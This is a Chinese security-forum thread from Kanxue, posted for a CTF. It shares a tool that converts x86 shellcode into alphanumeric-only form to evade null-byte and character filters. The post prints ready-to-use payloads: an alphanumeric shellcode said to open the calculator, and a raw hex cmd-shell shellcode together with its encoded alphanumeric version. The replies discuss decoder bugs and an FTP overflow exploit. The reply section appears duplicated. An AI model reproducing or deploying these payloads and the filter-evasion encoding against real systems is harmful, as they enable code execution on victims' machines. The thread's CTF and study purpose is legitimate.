[原创]ShellCodeToAscii-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]ShellCodeToAscii

2012-10-7 15:32 14429

[原创]ShellCodeToAscii

半斤八兩

2012-10-7 15:32

14429

/*
最近在玩西安电子大学的网络攻防比赛,里面的溢出赛题蛮有意思的,之前没有接触过.
其中最后一题的FTP溢出题,我写的EXP在我电脑上运行是正常的.可是在朋友的电脑上却失败.

最终原因,就是因为ShellCode的部分数据的影响.
最后看到别人有全字符的ShellCode,看起来很酷.(在网上搜了一下,看来源好像是Zwell写的ShellCode.)
后来拿来研究了一下.

其代码是分两段解释器.
都是将字母ShellCode转换成真正的ShellCode.
以此来绕过截0和其它等限制.

此代码的解释器用的是老外的.我只是改成MFC了.方便大家 :)

ShellCode From:
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
NOP
[ESP-0x10]
[ESP-0xC]
[ESP-0x8]
[ESP-0x4]
[ESP]
[ESP+0X4]
[ESP+0X8]
[ESP+0XC]
[ESP+0X10]
[ESP+0X14]
[ESP+0X18]
[ESP+0X1C]
[SEH]

Zwell's ShellCode:
char szShellCode[]=
"PZhSSUSX5SSUSH4C0B6RYkA7XA3A7A2B70B7BhTWUQX5TWUQ4c8A7ubi3PI7kQ1W"
"6W1EV9A84xdeLg3kIUKl3J6DuWNA8wk0kstyzbDKryeyza82vAMdMgMFjKVyBlEC"
"6aLM1PkaQxMXmC72VL4Oei1YUf1xmfqhh8d2V6ibZ7yCnxTUyelUTCeJ7YOM5HTu"
"ECIwjOLAkppdMagoJMl5ur69UdyEUysaAR9tG4ksEgaGEIy95zlsrRt2rt6twkhg"
"JNNBViHbsVE76oDEuUmwBpkanAQU30kavJmiUiqpMQMANIxonAMi5XHibCBnGNFJ"
"VJ3gGZhZ545BmdPGFoCuFb2mMiegVwvPLaCSyKWtAInpGu4jUxUwNa8c";

// 这个shellcode好像是打开计算器

本程序转换前的CmdShell:
"FC33D2B23064FF325A8B520C8B52148B722833C9B11833FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4A6A8B5A108B1275DA8B533C03D3FF72348B527803D38B722003F333C941AD03C381384765745075F4817804726F634175EB8178086464726575E2498B722403F3668B0C4E8B721C03F38B148E03D3526878656301FE4C24036857696E455453FFD268636D6401FE4C24036A0533C98D4C240451FFD068657373018BDFFE4C24036850726F63684578697454FF742420FF54242057FFD0";

// 本程序这个打开的是控制台

本程序转换后的CmdShell:
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylTsxROBP0Pdyo6RqJLKV2dLLKsbDTLKCBThDsHIMaTXTskOgCKpLlulu1sLs2FLepiQJoTMVcjXM2L0OqKOCkMlQZqznkBzDPLKDRD5yJLK0SGLuSZsKOqbvTlK3bPxdCxSNkT210uSZSP3O971nM5So3MQTxBgSUptPPRUL4oqqhuTRRPoqsw145JKmQD8c8u4pd420eBU9rSynkT2et7szSQvNkvlPNnkbRWl4CKCNkb4lNESkcRru8QhquSSEQ9nRlEtgsrHpWsYrNpECdpSyoZrU8e3pmE4UQKNRlutfcQz5UVSO9LMpLtdGtSayoJpRHu5Ps2SuQLKyOKNRlwTC3U82prRpo53bHSuPxbIBTV4KOptetWPkOsdQ4GPaGkOWp"

*/

简单程序,大牛路过~
ShellCodeToAscii.rar

[培训]二进制漏洞攻防（第3期）；满10人开班；模糊测试与工具使用二次开发；网络协议漏洞挖掘；Linux内核漏洞挖掘与利用；AOSP漏洞挖掘与利用；代码审计。

上传的附件：

ShellCodeToAscii.rar （22.02kb，570次下载）
ShellCodeToAscii.png （23.42kb，678次下载）

收藏・38

点赞・3

打赏

最新回复 (19)
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 15:34 2 楼 0 alpha3... http://code.google.com/p/alpha3/ PS: cm6 Post出来没？
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 162 粉丝 0 关注私信	uing 2012-10-7 15:40 3 楼 0 CM6胖爷给秒了; 顺便前排膜拜八爷...
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 15:52 4 楼 0 算法我不会,没有弄出来哈.
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 15:59 5 楼 0 我也蔫了。。尼玛第一个就开始做这个题。。结果信心打击到爆。。0分 ⊙﹏⊙b汗我只看到了4次base64一次MD5。。（嘘。。不算违规吧）那我也整不出来了
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 16:11 6 楼 0 其实我按我的方法也能整出来的. 只是那样出来的KEY就不一样了.大概71+2 73的长度. 他出的题有BUG的.
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 162 粉丝 0 关注私信	uing 2012-10-7 16:35 7 楼 0 其实还有个AES; AES(MD5(A), MD5(B)) == A2096DD3FE74B4EC
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 16:54 8 楼 0 你想exploit嘛。。。好吧
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 16:55 9 楼 0 我去 AES。。。。好吧
喵了个咪雪币： 45 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 33 粉丝 0 关注私信	喵了个咪 2012-10-7 20:56 10 楼 0 AES？……小弟以为那是DES，囧了占楼看各位大神讨论
HOWMP 雪币： 1635 活跃值： (1643) 能力值： ( LV6，RANK：80 ) 在线值：发帖 8 回帖 246 粉丝 7 关注私信	HOWMP 1 2012-10-7 20:57 11 楼 0 转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行上传的附件： ShellCodeToAscii.zip （7.05kb，164次下载）
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 21:40 12 楼 0 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 厉害啊. 这个写的不好的,我没有修改算法. 这个解密有靠概率问题的. 解密到尾部时,不会停止. 会继续解密,只到堆栈中,有出现 0x41, 才会停止解密. 我看过Zwell 大牛的ShellCode写的非常的好. 分两次解密引擎. 没有时间改啦,等有时间我再改吧. 我之所以写这个,是因为溢出题,第四题在虚拟机下有问题, 一开始我以为是字符的原因.刚刚调试分析了半天, 发现,原来是我向FTP SERVER send user and pass 以及 LIST packet 的时候,中间没有sleep 所以溢出失败. 惨痛教训啊. 这也证明了vm ware 理论速度确实比物理机的理论速度要快.
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 21:42 13 楼 0 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 最后一字节出错,是因为你PATCH了加密后的数据. 等有时间了,我再重写一个解密引擎吧.
snowdbg 雪币： 3171 活跃值： (71) 能力值： (RANK：250 ) 在线值：发帖 10 回帖 130 粉丝 2 关注私信	snowdbg 6 2012-10-8 08:15 14 楼 0 写得不错, 但是对于新手来讲,还需要多研究原理,傻瓜化的工具会让人懒惰
wqxxrn 雪币： 204 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 34 粉丝 0 关注私信	wqxxrn 2012-10-8 10:21 15 楼 0 傻瓜化的工具会让人懒惰，但也能从此慢慢入门。知道原理的，大部份还是会自己写来提取的。很少直接网上下载
zgyknight 雪币： 2 活跃值： (159) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 2012-10-9 16:31 16 楼 0 楼主的背影很好看
无常pl 雪币： 122 活跃值： (75) 能力值： ( LV7，RANK：100 ) 在线值：发帖 4 回帖 29 粉丝 1 关注私信	无常pl 2 2012-10-15 18:37 17 楼 0 就是DES吧，我用DES逆算出来的数据对啊
暖洋洋雪币： 9810 活跃值： (2929) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 99 粉丝 1 关注私信	暖洋洋 2015-6-14 11:52 18 楼 0 膜拜大神，学习一下了
DCO 雪币： 6836 活跃值： (1294) 能力值： ( LV10，RANK：174 ) 在线值：发帖 2 回帖 8 粉丝 0 关注私信	DCO 1 2019-10-19 13:41 19 楼 0 发现一个bug，当cal esp 或 cal [esp+xx]会错
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2020-2-15 04:18 20 楼 0 DCO 发现一个bug，当cal esp 或 cal [esp+xx]会错好细心我记得好像还有一个bug 好像是结束要有'Z'字符太久了不知道是不是记错了
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

半斤八兩

发帖

615

回帖

520

RANK

关注

私信

他的文章

[原创]穿山甲逆向实地培训

[原创]纯手工秒杀VM虚拟机Handle之II(含最新VMP主程序)

[原创]12306个人敏感信息泄露

[原创]查看QQ隐藏账号

关于我们

联系我们

企业服务

看雪公众号

最新回复 (19)
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 15:34 2 楼 0 alpha3... http://code.google.com/p/alpha3/ PS: cm6 Post出来没？
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 162 粉丝 0 关注私信	uing 2012-10-7 15:40 3 楼 0 CM6胖爷给秒了; 顺便前排膜拜八爷...
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 15:52 4 楼 0 算法我不会,没有弄出来哈.
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 15:59 5 楼 0 我也蔫了。。尼玛第一个就开始做这个题。。结果信心打击到爆。。0分 ⊙﹏⊙b汗我只看到了4次base64一次MD5。。（嘘。。不算违规吧）那我也整不出来了
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 16:11 6 楼 0 其实我按我的方法也能整出来的. 只是那样出来的KEY就不一样了.大概71+2 73的长度. 他出的题有BUG的.
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 162 粉丝 0 关注私信	uing 2012-10-7 16:35 7 楼 0 其实还有个AES; AES(MD5(A), MD5(B)) == A2096DD3FE74B4EC
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 16:54 8 楼 0 你想exploit嘛。。。好吧
Vsbat 雪币： 857 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 276 粉丝 4 关注私信	Vsbat 4 2012-10-7 16:55 9 楼 0 我去 AES。。。。好吧
喵了个咪雪币： 45 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 33 粉丝 0 关注私信	喵了个咪 2012-10-7 20:56 10 楼 0 AES？……小弟以为那是DES，囧了占楼看各位大神讨论
HOWMP 雪币： 1635 活跃值： (1643) 能力值： ( LV6，RANK：80 ) 在线值：发帖 8 回帖 246 粉丝 7 关注私信	HOWMP 1 2012-10-7 20:57 11 楼 0 转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行上传的附件： ShellCodeToAscii.zip （7.05kb，164次下载）
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 21:40 12 楼 0 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 厉害啊. 这个写的不好的,我没有修改算法. 这个解密有靠概率问题的. 解密到尾部时,不会停止. 会继续解密,只到堆栈中,有出现 0x41, 才会停止解密. 我看过Zwell 大牛的ShellCode写的非常的好. 分两次解密引擎. 没有时间改啦,等有时间我再改吧. 我之所以写这个,是因为溢出题,第四题在虚拟机下有问题, 一开始我以为是字符的原因.刚刚调试分析了半天, 发现,原来是我向FTP SERVER send user and pass 以及 LIST packet 的时候,中间没有sleep 所以溢出失败. 惨痛教训啊. 这也证明了vm ware 理论速度确实比物理机的理论速度要快.
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2012-10-7 21:42 13 楼 0 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 最后一字节出错,是因为你PATCH了加密后的数据. 等有时间了,我再重写一个解密引擎吧.
snowdbg 雪币： 3171 活跃值： (71) 能力值： (RANK：250 ) 在线值：发帖 10 回帖 130 粉丝 2 关注私信	snowdbg 6 2012-10-8 08:15 14 楼 0 写得不错, 但是对于新手来讲,还需要多研究原理,傻瓜化的工具会让人懒惰
wqxxrn 雪币： 204 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 34 粉丝 0 关注私信	wqxxrn 2012-10-8 10:21 15 楼 0 傻瓜化的工具会让人懒惰，但也能从此慢慢入门。知道原理的，大部份还是会自己写来提取的。很少直接网上下载
zgyknight 雪币： 2 活跃值： (159) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 2012-10-9 16:31 16 楼 0 楼主的背影很好看
无常pl 雪币： 122 活跃值： (75) 能力值： ( LV7，RANK：100 ) 在线值：发帖 4 回帖 29 粉丝 1 关注私信	无常pl 2 2012-10-15 18:37 17 楼 0 就是DES吧，我用DES逆算出来的数据对啊
暖洋洋雪币： 9810 活跃值： (2929) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 99 粉丝 1 关注私信	暖洋洋 2015-6-14 11:52 18 楼 0 膜拜大神，学习一下了
DCO 雪币： 6836 活跃值： (1294) 能力值： ( LV10，RANK：174 ) 在线值：发帖 2 回帖 8 粉丝 0 关注私信	DCO 1 2019-10-19 13:41 19 楼 0 发现一个bug，当cal esp 或 cal [esp+xx]会错
半斤八兩雪币： 221 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 65 回帖 615 粉丝 21 关注私信	半斤八兩 10 2020-2-15 04:18 20 楼 0 DCO 发现一个bug，当cal esp 或 cal [esp+xx]会错好细心我记得好像还有一个bug 好像是结束要有'Z'字符太久了不知道是不是记错了
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复